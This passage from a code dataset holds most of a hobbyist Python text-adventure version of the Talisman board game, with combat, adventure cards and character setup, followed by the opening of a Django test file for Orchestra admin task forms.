{align}.\".format(**chardict))\n#endregion\n\n# region: Turns and battles\n# Game Turn\ndef turn():\n x=roll()\n while True:\n side=input(\"Would you like to move to the {} (1) or the {} (2)? \".format(outer[(outer.index(chardict[\"space\"])+x)%len(outer)],outer[(outer.index(chardict[\"space\"])-x)%len(outer)]))\n if side==\"1\":\n chardict[\"space\"]=outer[(outer.index(chardict[\"space\"])+x)%len(outer)]\n print(\"\\nYou are at the {space}.\".format(**chardict))\n encounter()\n break\n elif side==\"2\":\n chardict[\"space\"]=outer[(outer.index(chardict[\"space\"])-x)%len(outer)]\n print(\"\\nYou are at the {space}.\".format(**chardict))\n encounter()\n break\n else:\n print(error)\n# Battles\ndef battle(name,strength):\n charattack = roll() + chardict[\"strength\"]\n print(f\"Your attack score is {charattack}.\")\n enemyattack = roll() + strength\n print(f\"The {name}'s attack score is {enemyattack}.\")\n while chardict[\"fate\"] > 0:\n reroll = input(\"Would you like to reroll for 1 fate(Y/N)? \")\n if reroll==\"Y\":\n charattack = roll() + chardict[\"strength\"]\n print(f\"Your attack score is {charattack}.\")\n losefate()\n break\n elif reroll==\"N\": break\n else: print(error)\n if charattack > enemyattack:\n print(f\"You have killed the {name}.\")\n return 1\n elif charattack < enemyattack:\n print(f\"You have been defeated by the {name}.\")\n wound()\n return -1\n else:\n print(f\"You have reached a stand-off with the {name}.\")\n return 0\n# Psychic Combat\ndef psychic(name,craft):\n charattack = roll() + chardict[\"craft\"]\n print(f\"Your attack score is {charattack}.\")\n enemyattack = roll() + craft\n print(f\"The {name}'s attack score is {enemyattack}.\")\n while chardict[\"fate\"] > 0:\n reroll = input(\"Would you like to reroll for 1 fate(Y/N)? \")\n if reroll==\"Y\":\n charattack = roll() + chardict[\"craft\"]\n print(f\"Your attack score is {charattack}.\")\n losefate()\n break\n elif reroll==\"N\": break\n else: print(error)\n if charattack > enemyattack:\n print(f\"You have killed the {name}.\")\n return 1\n elif charattack < enemyattack:\n print(f\"You have been defeated by the {name}.\")\n wound()\n return -1\n else:\n print(f\"You have reached a stand-off with the {name}.\")\n return 0\n#endregion\n\n# Adventures\ndef adventure(card = None, prior = False):\n if card == None:\n card = r.choice(adventures)\n\n if card==\"Wild Boar\":\n print(\"There is a Wild Boar roaming this area.\")\n result = battle(\"Wild Boar\",1)\n elif card==\"Wolf\":\n print(\"A vicious Wolf now dwells this area.\")\n result = battle(\"Wolf\",2)\n elif card==\"Ape\":\n print(\"A savage Ape is terrorising this area.\")\n result = battle(\"Ape\",3)\n elif card==\"Bear\":\n print(\"A ferocious Bear is running amok in this area.\")\n result = battle(\"Bear\",3)\n elif card==\"Lion\":\n print(\"A Lion is preying on everything in this area.\")\n result = battle(\"Lion\",3)\n elif card==\"Serpent\":\n print(\"A Serpent has made its home in this area.\")\n result = battle(\"Serpent\",4)\n elif card==\"Dragon\":\n print(\"A fearsome Dragon is terrorising this area.\")\n result = battle(\"Dragon\",7)\n elif card==\"Goblin\":\n print(\"A Goblin is laying waste to this area.\")\n result = battle(\"Goblin\",2)\n elif card==\"Hobgoblin\":\n print(\"A brutal Hobgoblin is stalking this area.\")\n result = battle(\"Hobgoblin\",3)\n elif card==\"Bandit\":\n print(\"A Bandit is marauding in this area. He will not attack if you pay 1 gold. He will remain here until he is killed.\")\n if chardict[\"gold\"] > 0:\n while True:\n payment = input(\"Do you wish to pay the bandit off(Y/N)? \")\n if payment==\"Y\":\n poor(1)\n print(\"You have paid the bandit off.\")\n break\n elif payment==\"N\":\n break\n else:\n print(error)\n result = battle(\"Bandit\",4)\n elif card==\"Ogre\":\n print(\"An Ogre has decided this area is easy pickings.\")\n result = battle(\"Ogre\",5)\n elif card==\"Giant\":\n print(\"An immense Giant has set up residence in this area.\")\n result = battle(\"Giant\",6)\n elif card==\"Lemure\":\n print(\"This lowly creature from the Underworld pounces at you from the shadows.\")\n result = psychic(\"Lemure\",1)\n elif card==\"Shadow\":\n print(\"A Shadow is lurking in the dark corners of this area.\")\n result = psychic(\"Shadow\",2)\n elif card==\"Spectre\":\n print(\"A Spectre has appeared in this area.\")\n result = psychic(\"Spectre\",3)\n elif card==\"Ghost\":\n if \"Ghost\" in spacedict[chardict[\"space\"]]:\n print(\"A Ghost haunts this area.\")\n result = psychic(\"Ghost\",4)\n else:\n place = r.choice((\"City\",\"Village\",\"Graveyard\",\"Chapel\",\"Castle\"))\n print(f\"A Ghost materialises in the {place}. It now haunts this area and will remain until it is killed.\")\n spacedict[place].append(\"Ghost\")\n result = 1\n elif card==\"Wraith\":\n print(\"A Wraith is wreaking havoc in this area.\")\n result = psychic(\"Wraith\",5)\n elif card==\"Demon\":\n print(\"A Demon has appeared from the underworld to cause chaos in this area.\")\n result = psychic(\"Demon\",10)\n elif card==\"Angel\":\n print(\"An Angel has arrived.\")\n if chardict[\"align\"]==\"Good\":\n print(\"Gain 1 Life.\")\n chardict[\"life\"]+=1\n elif chardict[\"align\"]==\"Evil\":\n print(\"Lose 1 Life.\")\n wound()\n else:\n print(\"Nothing happens.\")\n result = 1\n elif card==\"Blizzard\":\n print(\"Winter has come with a vengeance and a Blizzard envelops the land. For two rounds, all characters, no matter what Region they are in, may only move one space per turn. The Blizzard then abates to the discard pile. \"+implem)\n result = 1\n elif card==\"Book of Spells\":\n print(\"You have found the fabled Book of Spells. You gain your full complement of Spells, according to your current Craft. \"+implem)\n result = 1\n elif card==\"Devil\":\n print(\"You are visited by a Devil.\")\n if chardict[\"align\"]==\"Good\":\n print(\"Lose 1 Life.\")\n wound()\n elif chardict[\"align\"]==\"Evil\":\n print(\"Gain 1 Life.\")\n chardict[\"life\"]+=1\n else:\n print(\"Nothing happens.\")\n result = 1\n elif card==\"Evil Darkness\":\n print(\"An Evil Darkness from the nether worlds sweeps the land. An Evil Darkness from the nether worlds sweeps the land. All characters except those of evil alignment must miss one turn. \"+implem)\n result = 1\n elif card==\"Imp\":\n place = r.choice((\"Crags\",\"Forest\",\"Tavern\",\"Ruins\")) # Add Hidden Valley and Cursed Glade\n print(f\"You meet a mischievous Imp. He teleports you to the {place}.\")\n chardict[\"space\"] = place\n result = 1\n elif card==\"Magical Vortex\":\n print(\"A Magical Vortex absorbs all Spells from every character. \"+implem)\n result = 1\n elif card==\"Market Day\":\n print(\"It's Market Day across the land. You may buy: a Sword (1G), a Helmet (1G), a Mule (2G), a Shield (2G), a Water Bottle (1G), or a Raft (3G). \"+implem)\n result = 1\n elif card==\"Mephistopheles\":\n print(\"You have been encountered by Mephistopheles on a mission to this land.\")\n if chardict[\"align\"]==\"Evil\":\n print(\"Gain 1 Craft.\")\n chardict[\"craft\"]+=1\n else:\n print(\"You become Evil.\")\n realign(\"Evil\")\n result = 1\n elif card==\"Pestilence\":\n print(\"Pestilence has befouled this Region.\")\n wound()\n result = 1\n elif card==\"Raiders\":\n print(\"A band of Raiders attacks you and steals all your gold. They immediately stash the gold at the Oasis and retreat to their hide-out. Note: The Oasis has not yet been implemented.\") # Add gold to Oasis\n chardict[\"gold\"] = 0\n result = 1\n elif card==\"Siren\":\n print(\"A Siren's song can be heard throughout the Region. \"+implem) # All characters in Region miss 1 Turn\n result = 1\n elif card==\"Storm\":\n print(\"A Storm sweeps through this Region.\" +implem) # All the characters in this Region must miss 1 turn.\n result = 1\n elif card==\"Enchanter\":\n print(\"An Enchanter seeks an able adventurer.\")\n if chardict[\"craft\"] < 4:\n print(\"You do not have enough Craft.\")\n result = 0\n else:\n while True:\n enchant=input(\"Choose one: Gain 1 Spell (S), Gain 1 gold (G), Gain 1 Strength (S2), Gain 1 Craft (C), Gain 1 Life (L), Gain 1 Fate (F), or teleport to any space in this region (T). \")\n if enchant==\"S\":\n print(implem)\n break\n if enchant==\"G\":\n print(\"Gain 1 gold.\")\n chardict[\"gold\"]+=1\n break\n if enchant==\"S2\":\n print(\"Gain 1 Strength.\")\n chardict[\"strength\"]+=1\n break\n if enchant==\"C\":\n print(\"Gain 1 Craft.\")\n chardict[\"craft\"]+=1\n break\n if enchant==\"L\":\n print(\"Gain 1 Life.\")\n chardict[\"life\"]+=1\n break\n if enchant==\"F\":\n print(\"Gain 1 fate.\")\n chardict[\"fate\"]+=1\n break\n if enchant==\"T\":\n options = list(enumerate(outer,1))\n while True:\n place = input(\"Would you like to move to the: {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), or {} ({})? \".format(*options))\n if place in range(1,25):\n chardict[\"space\"] = outer[place]\n break\n else: print(error)\n break\n else:\n print(error)\n result = 1\n elif card==\"Fairy\":\n print(\"A Fairy seeks a champion.\")\n if chardict[\"align\"] != \"Good\":\n print(\"You are not Good enough.\")\n else:\n while True:\n enchant=input(\"Choose one: Gain 1 Spell (S), Gain 1 gold (G), Gain 1 Strength (S2), Gain 1 Craft (C), Gain 1 Life (L), Gain 1 Fate (F), or teleport to any space in this region (T). \")\n if enchant==\"S\":\n print(implem)\n break\n if enchant==\"G\":\n print(\"Gain 1 gold.\")\n chardict[\"gold\"]+=1\n break\n if enchant==\"S2\":\n print(\"Gain 1 Strength.\")\n chardict[\"strength\"]+=1\n break\n if enchant==\"C\":\n print(\"Gain 1 Craft.\")\n chardict[\"craft\"]+=1\n break\n if enchant==\"L\":\n print(\"Gain 1 Life.\")\n chardict[\"life\"]+=1\n break\n if enchant==\"F\":\n print(\"Gain 1 fate.\")\n chardict[\"fate\"]+=1\n break\n if enchant==\"T\":\n options = list(enumerate(outer,1))\n while True:\n place = input(\"Would you like to move to the: {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), or {} ({})? \".format(*options))\n if place in range(1,25):\n chardict[\"space\"] = outer[place]\n break\n else: print(error)\n break\n else:\n print(error)\n result = 1\n elif card==\"Healer\":\n print(\"A Healer has made his home here for the rest of the game. He will heal up to 2 lives per visit for any character landing here.\")\n heal(2)\n result = 0\n elif card==\"Hermit\":\n place = r.choice((\"Crags\",\"Forest\")) # Add Crypt, Plain of Peril, Cursed Glade, Oasis\n print(f\"The Hermit moves to the {place}. He will give the first person to visit him there a Talisman. \"+implem) # Implement\n result = 1\n elif card==\"Mage\":\n print(\"A kindly Mage has made his home here for the rest of the game. He will give one Spell per visit to each Good character landing here. \"+implem)\n result = 1\n elif card==\"Phantom\":\n print(\"A Phantom will haunt this space until it has granted the first evil character to visit it one of the following wishes.\")\n if chardict[\"align\"] != \"Evil\":\n print(\"You are not Evil enough.\")\n else:\n while True:\n enchant=input(\"Choose one: Gain 1 Spell (S), Gain 1 gold (G), Gain 1 Strength (S2), Gain 1 Craft (C), Gain 1 Life (L), Gain 1 Fate (F), or teleport to any space in this region (T). \")\n if enchant==\"S\":\n print(implem)\n break\n if enchant==\"G\":\n print(\"Gain 1 gold.\")\n chardict[\"gold\"]+=1\n break\n if enchant==\"S2\":\n print(\"Gain 1 Strength.\")\n chardict[\"strength\"]+=1\n break\n if enchant==\"C\":\n print(\"Gain 1 Craft.\")\n chardict[\"craft\"]+=1\n break\n if enchant==\"L\":\n print(\"Gain 1 Life.\")\n chardict[\"life\"]+=1\n break\n if enchant==\"F\":\n print(\"Gain 1 fate.\")\n chardict[\"fate\"]+=1\n break\n if enchant==\"T\":\n options = list(enumerate(outer,1))\n while True:\n place = input(\"Would you like to move to the: {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), or {} ({})? \".format(*options))\n if place in range(1,25):\n chardict[\"space\"] = outer[place]\n break\n else: print(error)\n break\n else:\n print(error)\n result = 1\n elif card==\"Sorcerer\":\n print(\"A Sorcerer has set up shop here and will remain for the rest of the game. He sells Spells at the price of 1 gold per Spell. You may buy one Spell per visit. \"+implem)\n result = 1\n elif card==\"Witch\":\n print(\"A Witch lurks in this space for the rest of the game.\")\n witch = roll()\n if witch==1:\n print(\"Become a Toad for 3 turns. \"+implem)\n elif witch==2:\n print(\"Lose 1 Life.\")\n wound()\n elif witch==3:\n print(\"Gain 1 Strength.\")\n chardict[\"strength\"]+=1\n elif witch==4:\n print(\"Gain 1 Craft.\")\n chardict[\"craft\"]+=1\n elif witch==5:\n print(\"Gain 1 Spell. \"+implem)\n elif witch==6:\n print(\"Replenish all fate.\")\n replenish()\n result = 0\n elif card==\"Cave\":\n print(\"This Cave will remain here. See what you discover: \")\n cavevent = roll()\n if cavevent==1:\n print(\"You encounter a Dragon.\")\n battle(\"Dragon\",7)\n elif cavevent==2:\n print(\"You encounter a Goblin.\")\n battle(\"Goblin\",2)\n elif cavevent==3:\n print(\"You are lost. \"+implem)\n elif cavevent==4 or cavevent == 5:\n print(\"Gain 2 gold.\")\n chardict[\"gold\"]+=2\n elif cavevent==6:\n print(\"Gain 3 gold.\")\n chardict[\"gold\"]+=3\n result = 0\n elif card==\"Fountain of Wisdom\":\n if prior == False:\n fountain = 4\n print(\"The Fountain of Wisdom is revealed. You may drink from the Fountain once per visit and gain 1 Craft. Once 4 Craft is taken, the Fountain shall vanish.\")\n chardict[\"craft\"]+=1\n fountain-=1\n result = 0\n else:\n print(\"You drink from the Fountain of Wisdom and gain 1 Craft.\")\n chardict[\"craft\"]+=1\n fountain-=1\n if fountain > 0:\n print(f\"There are {fountain} drinks remaining.\")\n result = 0\n else:\n print(\"The Fountain of Wisdom disappears.\")\n result = 1\n\n else:\n print(f\"You encounter a {card}. \"+implem)\n result = 1\n \n if result <= 0 and prior == False:\n spacedict[chardict[\"space\"]].append(card)\n elif result == 1 and prior == True:\n spacedict[chardict[\"space\"]].remove(card)\n \n if result <= 0 and card in enemies:\n return 0\n else:\n return 1\n\n# Encounters\ndef encounter():\n # Check if cards already exist\n count = len(spacedict[chardict[\"space\"]])\n for i in range(count):\n encounter = adventure(spacedict[chardict[\"space\"]][0],prior=True)\n if encounter == 0: return\n # Adventure Spaces\n if any(x in chardict[\"space\"] for x in [\"Fields\",\"Plains\",\"Woods\",\"Hills\",\"Sentinel\"]):\n if count == 0:\n encounter = adventure() # Draw an Adventure card\n if encounter == 0: return\n elif chardict[\"space\"] == \"Ruins\":\n for i in range(2-count):\n adventure()\n elif chardict[\"space\"]==\"Forest\":\n forevent=roll()\n if forevent==1:\n print(\"You are attacked by a brigand.\")\n result = battle(\"Brigand\",4)\n if result <= 0: return\n elif forevent<4:\n print(\"You are lost. \"+implem) # Miss a Turn\n elif forevent<6:\n print(\"You are safe.\")\n elif forevent==6:\n print(\"A Ranger guides you out. You gain 1 Craft.\")\n chardict[\"craft\"]+=1\n elif chardict[\"space\"]==\"Crags\":\n cragevent=roll()\n if cragevent==1:\n print(\"You are attacked by a spirit.\")\n result = psychic(\"Spirit\",4)\n if result <= 0: return\n elif cragevent<4:\n print(\"You are lost. \"+implem) # Miss a Turn\n elif cragevent<6:\n print(\"You are safe.\")\n elif cragevent==6:\n print(\"A Barbarian guides you out. Gain 1 Strength.\")\n chardict[\"strength\"]+=1\n elif chardict[\"space\"]==\"Graveyard\":\n if chardict[\"align\"]==\"Good\":\n print(\"You lose 1 Life.\")\n wound()\n elif chardict[\"align\"]==\"Neutral\":\n print(\"No effect.\")\n elif chardict[\"align\"]==\"Evil\":\n gravevent=roll()\n if gravevent==1:\n print(\"Miss 1 turn. \"+implem)\n elif gravevent<5:\n print(\"Heal 1 Life.\")\n heal(1)\n elif gravevent>=5:\n print(\"Gain 1 spell. \"+implem)\n elif chardict[\"space\"]==\"Tavern\":\n tavevent=roll()\n if tavevent==1:\n print(\"You get blind and drunk and collapse in a corner. \"+implem) # Miss a Turn\n if tavevent==2:\n print(\"You get tipsy and get in a fight with a farmer.\")\n result = battle(\"Farmer\",3)\n if result <= 0: return\n if tavevent==3:\n print(\"You gamble and lose 1 Gold Coin.\")\n poor(1)\n if tavevent==4:\n print(\"You gamble and win 1 Gold Coin.\")\n chardict[\"gold\"]+=1\n if tavevent==5:\n print(\"A wizard offers to Teleport you to an Outer Region space of your choice as your next Move. \"+implem)\n if tavevent==6:\n print(\"A boatman offers to ferry you to the Temple as your next Move. \"+implem)\n elif chardict[\"space\"]==\"Village\":\n while True:\n vill=input(\"You may visit the Healer(H), the Blacksmith(B), or the Mystic(M): \")\n if vill==\"H\":\n print(\"The Healer will restore Lives at the cost of 1 Gold Coin each, up to your starting quota.\")\n if chardict[\"life\"]==chardict[\"maxl\"]:\n print(\"However, you are already at full health.\")\n break\n else:\n while True:\n med=input(\"How many Gold Coins would you like to pay? \")\n if med in [\"0\",\"1\",\"2\",\"3\",\"4\",\"5\"]:\n med=int(med)\n if med(chardict[\"maxl\"]-chardict[\"life\"]):\n print(\"That's too much gold, you don't need to heal that much.\")\n continue\n else:\n poor(med)\n heal(med)\n break\n else:\n print(error)\n break\n elif vill==\"B\":\n print(\"The Blacksmith sells the following Objects at the following prices (if available): Helmet at 2G (H), Sword at 2G (S), Axe at 2G (A), Shield at 3G (S2), Armour at 4G (A2) \"+implem)\n break\n elif vill==\"M\":\n mystevent=roll()\n if mystevent<4:\n print(\"You are ignored.\")\n elif mystevent==4:\n print(\"You become Good.\")\n realign(\"Good\")\n elif mystevent==5:\n print(\"Gain 1 Craft.\")\n chardict[\"craft\"]+=1\n elif mystevent==6:\n print(\"Gain 1 Spell. \"+implem)\n break\n else:\n print(error)\n elif chardict[\"space\"]==\"Chapel\":\n if chardict[\"align\"]==\"Evil\":\n print(\"You lose one life.\")\n wound()\n elif chardict[\"align\"]==\"Neutral\":\n print(\"You may be Healed back up to your starting quota at the cost of 1 Gold Coin per Life. \")\n if chardict[\"life\"]==chardict[\"maxl\"]:\n print(\"However, you are already at full health.\")\n else:\n while True:\n med=input(\"How many Gold Coins would you like to pay? \")\n if med in [\"0\",\"1\",\"2\",\"3\",\"4\",\"5\"]:\n med=int(med)\n if med(chardict[\"maxl\"]-chardict[\"life\"]):\n print(\"That's too much gold, you don't need to heal that much.\")\n continue\n else:\n poor(med)\n heal(med)\n break\n else:\n print(error)\n elif chardict[\"align\"]==\"Good\":\n chapevent=roll()\n if chapevent<5:\n print(\"You are ignored.\")\n elif chapevent==5:\n print(\"Gain 1 Life.\")\n chardict[\"life\"]+=1\n elif chapevent==6:\n print(\"Gain 1 Spell. \"+implem)\n elif chardict[\"space\"]==\"City\":\n while True:\n cit=input(\"You may visit the Enchantress(E), the Doctor(D), or the Alchemist(A): \")\n if cit==\"A\":\n print(\"He will turn any of your Objects into Gold Coin. Give him your Objects and get 1 Gold Coin for each. \"+implem)\n break\n elif cit==\"D\":\n print(\"He will Heal up to 2 Lives at the cost of 1 Gold Coin each.\")\n if chardict[\"life\"]==chardict[\"maxl\"]:\n print(\"However, you are already at full health.\")\n break\n else:\n while True:\n med=input(\"How many Gold Coins would you like to pay? (0, 1, or 2) \")\n if med in [\"0\",\"1\",\"2\"]:\n med=int(med)\n if med(chardict[\"maxl\"]-chardict[\"life\"]):\n print(\"That's too much gold, you don't need to heal that much.\")\n continue\n else:\n poor(med)\n heal(med)\n break\n else:\n print(error)\n break\n elif cit==\"E\":\n enchevent=roll()\n if enchevent==1:\n print(\"You are turned into a Toad for 3 turns. \"+implem)\n elif enchevent==2:\n print(\"Lose 1 Strength.\")\n weak()\n elif enchevent==3:\n print(\"Lose 1 Craft.\")\n dumb()\n elif enchevent==4:\n print(\"Gain 1 Craft.\")\n chardict[\"craft\"]+=1\n elif enchevent==5:\n print(\"Gain 1 Strength.\")\n chardict[\"strength\"]+=1\n elif enchevent==6:\n print(\"Gain 1 Spell. \"+implem)\n break\n else:\n print(error)\n \n else:\n print(implem)\n\n# region: Game\n# Introduction\nprint(\"Welcome to a Python implementation of Talisman (Revised 4th Edition). In this simplified version (v), there is no winning objective. To play the game, type a letter to signal your decision when given a prompt.\")\n# Acknowledgement\nwhile True:\n ack=input(\"Type Yes(Y) to acknowledge: \")\n if ack == \"Y\":\n print(\"\\nGreat! Then let us begin.\")\n break\n else:\n print(error)\n# Character Setup\nprint(\"Now you need to choose which character you will enter the land of Talisman as.\")\nwhile True:\n char=input(\"Will you be the Assassin(A), the Druid(D), the Dwarf(D2), the Elf(E), the Ghoul(G), the Minstrel(M), the Monk(M2), the Priest(P), the Prophetess(P2), the Sorceress(S), the Thief(T), the Troll(T2), the Warrior(W), or the Wizard(W2)? \")\n if char in [\"A\",\"D\",\"D2\",\"E\",\"G\",\"M\",\"M2\",\"P\",\"P2\",\"S\",\"T\",\"T2\",\"W\",\"W2\"]:\n chardict=emptydict.copy()\n if char == \"A\":\n chardict.update({\"name\":\"Assassin\",\"start\":\"City\",\"align\":\"Evil\",\"strength\":3,\"craft\":3,\"life\":4,\"fate\":3})\n chardict[\"addinfo\"]=\"You may assassinate when you attack a character or creature. You cannot assassinate when you are attacked by another character. When you assassinate, battle takes place as normal except that your victim may not roll a die to add to his Strength. If you win, you must force the loser to lose 1 life; you cannot take an Object or gold instead. You may not assassinate while at the Crown of Command.\"\n elif char==\"D\":\n chardict.update({\"name\":\"Druid\",\"start\":\"Forest\",\"align\":\"Neutral\",\"strength\":2,\"craft\":4,\"life\":4,\"fate\":4})\n chardict[\"addinfo\"]=\"You begin the game with one Spell. You may change your alignment at will. At any given time though, you can only be of one alignment. For example, if you are carrying the Runesword and you wish to pray at the Chapel, you must ditch the Runesword. Whenever you land on the Woods, you may gain your full complement of Spells, according to your current Craft.\"\n elif char == \"D2\":\n chardict.update({\"name\":\"Dwarf\",\"start\":\"Crags\",\"align\":\"Neutral\",\"strength\":3,\"craft\":3,\"life\":5,\"fate\":5})\n chardict[\"addinfo\"]=\"You need not roll the die in the Crags or the Chasm unless you wish to. If you choose to roll, you must accept the result. You may evade creatures and characters in the Hills. After rolling the die in the Cave, you may add 1 to the score. You need only roll 1 die if you attempt to open the Portal of Power by Craft. You need only roll 2 dice in the Mines. You are unaffected by the Maze.\"\n elif char == \"E\":\n chardict.update({\"name\":\"Elf\",\"start\":\"Forest\",\"align\":\"Good\",\"strength\":3,\"craft\":4,\"life\":4,\"fate\":3})\n chardict[\"addinfo\"]=\"You need not roll the die in the Forest unless you wish to. If you choose to roll, you must accept the result. You may evade creatures and characters in the Woods. If you are on the Woods, instead of rolling the die for your move, you may move to any other Woods in the same Region.\"\n elif char == \"G\":\n chardict.update({\"name\":\"Ghoul\",\"start\":\"Graveyard\",\"align\":\"Evil\",\"strength\":2,\"craft\":4,\"life\":4,\"fate\":4})\n chardict[\"addinfo\"]=\"When you attack another character, you may choose to make the attack psychic combat. You may not do this when you are attacked by another character. Whenever you defeat a character in psychic combat, if you choose to take one of his lives, add it to your own. When you kill an Enemy in battle, you may raise it from the dead and keep it as a Follower instead of a trophy. You may have one of your raised Followers add its Strength to yours for one battle, after which it disintegrates to the discard pile. You may only use one raised Follower per battle.\"\n elif char == \"M\":\n chardict.update({\"name\":\"Minstrel\",\"start\":\"Tavern\",\"align\":\"Good\",\"strength\":2,\"craft\":4,\"life\":4,\"fate\":5})\n chardict[\"addinfo\"]=\"Animals and Dragons will not attack you, although you may choose to attack them. If you do not attack an Animal, you may attempt to charm it. To do so, roll 1 die: if you roll higher than the Animal's Strength, it joins you as a Follower and adds its Strength to yours in battle. You may only use one charmed Animal per battle. You may take the Maiden and Princess from a character you land on.\"\n elif char == \"M2\":\n chardict.update({\"name\":\"Monk\",\"start\":\"Village\",\"align\":\"Good\",\"strength\":2,\"craft\":3,\"life\":4,\"fate\":5})\n chardict[\"addinfo\"]=\"Your inner belief allows you to add your Craft value to your Strength during battle. After rolling the die when praying, you may add 1 to the score. You may not use any Weapon or Armour during battle.\"\n elif char == \"P\":\n chardict.update({\"name\":\"Priest\",\"start\":\"Chapel\",\"align\":\"Good\",\"strength\":2,\"craft\":4,\"life\":4,\"fate\":5})\n chardict[\"addinfo\"]=\"You begin the game with one Spell. After rolling the die when praying, you may add 1 to the score. You may choose to automatically destroy any Spirits without resorting to psychic combat. When you destroy a Spirit in this manner, you may not keep the Enemy as a trophy but you may gain one Spell. You may not use any Weapon during battle.\"\n elif char == \"P2\":\n chardict.update({\"name\":\"Prophetess\",\"start\":\"Chapel\",\"align\":\"Good\",\"strength\":2,\"craft\":4,\"life\":4,\"fate\":2})\n chardict[\"addinfo\"]=\"You begin the game with one Spell. During the game, you always have at least one Spell. (Gain a Spell each time you cast your last Spell). Whenever you have to draw Adventure Cards, you may discard one card of your choice that you do not wish to encounter and draw one more card to replace it, which you must encounter. At any time during the game, you may look at the Spell Cards held by other characters.\"\n elif char == \"S\":\n chardict.update({\"name\":\"Sorceress\",\"start\":\"Graveyard\",\"align\":\"Evil\",\"strength\":2,\"craft\":4,\"life\":4,\"fate\":3})\n chardict[\"addinfo\"]=\"You begin the game with one Spell. When you attack another character, you may choose to make the attack psychic combat. You may not do this when you are attacked by another character. You may attempt to beguile a character that you land on, allowing you to take one gold or Object of your choice. To do so, roll one die: you must roll a 6 to beguile a good character; 5 or 6 for a neutral character; or a 4, 5, or 6 for an evil character. You may take any one Follower, except the Maiden, Unicorn, or Princess from a character that you land on.\"\n elif char == \"T\":\n chardict.update({\"name\":\"Thief\",\"start\":\"City\",\"align\":\"Neutral\",\"strength\":3,\"craft\":3,\"life\":4,\"fate\":2})\n chardict[\"addinfo\"]=\"You may take one gold or Object of your choice from a character that you land on. Whenever you visit the Market, Market Day, or Village you may take one card of your choice from the Purchase deck for free.\"\n elif char == \"T2\":\n chardict.update({\"name\":\"Troll\",\"start\":\"Crags\",\"align\":\"Neutral\",\"strength\":6,\"craft\":1,\"life\":6,\"fate\":1})\n chardict[\"addinfo\"]=\"You need not roll the die in the Crags unless you wish to. If you choose to roll, you must accept the result. Whenever you roll a 6 for your move, you may regenerate instead of moving. If you choose to regenerate, heal one life and your turn immediately ends.\"\n elif char == \"W\":\n chardict.update({\"name\":\"Warrior\",\"start\":\"Tavern\",\"align\":\"Neutral\",\"strength\":4,\"craft\":2,\"life\":5,\"fate\":1})\n chardict[\"addinfo\"]=\"You may roll two dice in battle and use the higher attack roll to determine your attack score. You may use two Weapons at the same time.\"\n elif char == \"W2\":\n chardict.update({\"name\":\"Wizard\",\"start\":\"Graveyard\",\"align\":\"Evil\",\"strength\":2,\"craft\":5,\"life\":4,\"fate\":3})\n chardict[\"addinfo\"]=\"You begin the game with two Spells. During the game, you always have at least one Spell. (Gain a Spell each time you cast your last Spell) When you attack another character, you may choose to make the attack psychic combat. You may not do this when you are attacked by another character.\"\n print(\"\\nGood choice! You are now the {name}. You are a {align} character who starts in the {start}. You have {strength} strength, {craft} craft, {life} life, and {fate} fate. {addinfo}\".format(**chardict))\n break\n else:\n print(error)\n# Begin Game\nwhile True:\n ready=input(\"Are you ready to proceed(Y/N)? \")\n if ready==\"Y\":\n print(\"\\nThen we are ready to begin.\")\n break\n elif ready==\"N\":\n print(\"\\nHm, I'm sorry you don't feel ready, but I'm afraid we must proceed anyways.\")\n continue\n else:\n print(error)\n# Starting Setup\nchardict[\"space\"]=chardict[\"start\"]\nchardict[\"mins\"]=chardict[\"strength\"]\nchardict[\"minc\"]=chardict[\"craft\"]\nchardict[\"maxl\"]=chardict[\"life\"]\nchardict[\"maxf\"]=chardict[\"fate\"]\nprint(\"You start at the {space}. You must now move.\".format(**chardict),end=\" \")\n\n[turn() for i in range(1000)] # Game\n\n# Conclusion\ngameover()\n#endregion\n","sub_path":"python/talisman.py","file_name":"talisman.py","file_ext":"py","file_size_in_byte":40738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"335245396","text":"from unittest.mock import patch\n\nfrom django.forms.models import model_to_dict\nfrom django.test import override_settings\nfrom django.utils import timezone\n\nfrom orchestra.admin.forms import TaskForm\nfrom orchestra.core.errors import WorkerCertificationError\nfrom orchestra.models import Task\nfrom orchestra.models import TaskAssignment\nfrom orchestra.tests.helpers import OrchestraTestCase\nfrom orchestra.tests.helpers.fixtures import setup_models\nfrom orchestra.tests.helpers.fixtures import ProjectFactory\nfrom orchestra.utils.task_lifecycle import assign_task\nfrom orchestra.utils.task_lifecycle import create_subsequent_tasks\nfrom orchestra.utils.task_lifecycle import submit_task\nfrom orchestra.utils.task_properties import assignment_history\nfrom orchestra.utils.task_properties import is_worker_assigned_to_task\n\n\nclass AdminTestCase(OrchestraTestCase):\n\n def setUp(self):\n super(AdminTestCase, self).setUp()\n setup_models(self)\n\n @override_settings(MACHINE_STEP_SCHEDULER=(\n 'orchestra.utils.machine_step_scheduler',\n 'SynchronousMachineStepScheduler'))\n def test_task_form_init(self):\n \"\"\"\n Test task form initialization for new, human and machine tasks\n \"\"\"\n # Create new task form\n # (Test form init with no task instance)\n TaskForm()\n\n project = self.projects['test_human_and_machine']\n self.assertEquals(Task.objects.filter(project=project).count(), 0)\n create_subsequent_tasks(project)\n\n # Human task was created but not assigned\n # (Test form init with empty assignment history)\n self.assertEquals(Task.objects.filter(project=project).count(),\n 1)\n human_task = Task.objects.filter(project=project).first()\n form = TaskForm(instance=human_task)\n self.assertEquals(form.fields['currently_assigned_to'].initial,\n None)\n\n # Human task assigned to entry_level worker\n # (Test form init with a single entry-level worker)\n human_task = assign_task(self.workers[0].id, human_task.id)\n form = TaskForm(instance=human_task)\n with patch('orchestra.utils.task_lifecycle._is_review_needed',\n return_value=True):\n human_task = submit_task(human_task.id, {},\n TaskAssignment.SnapshotType.SUBMIT,\n 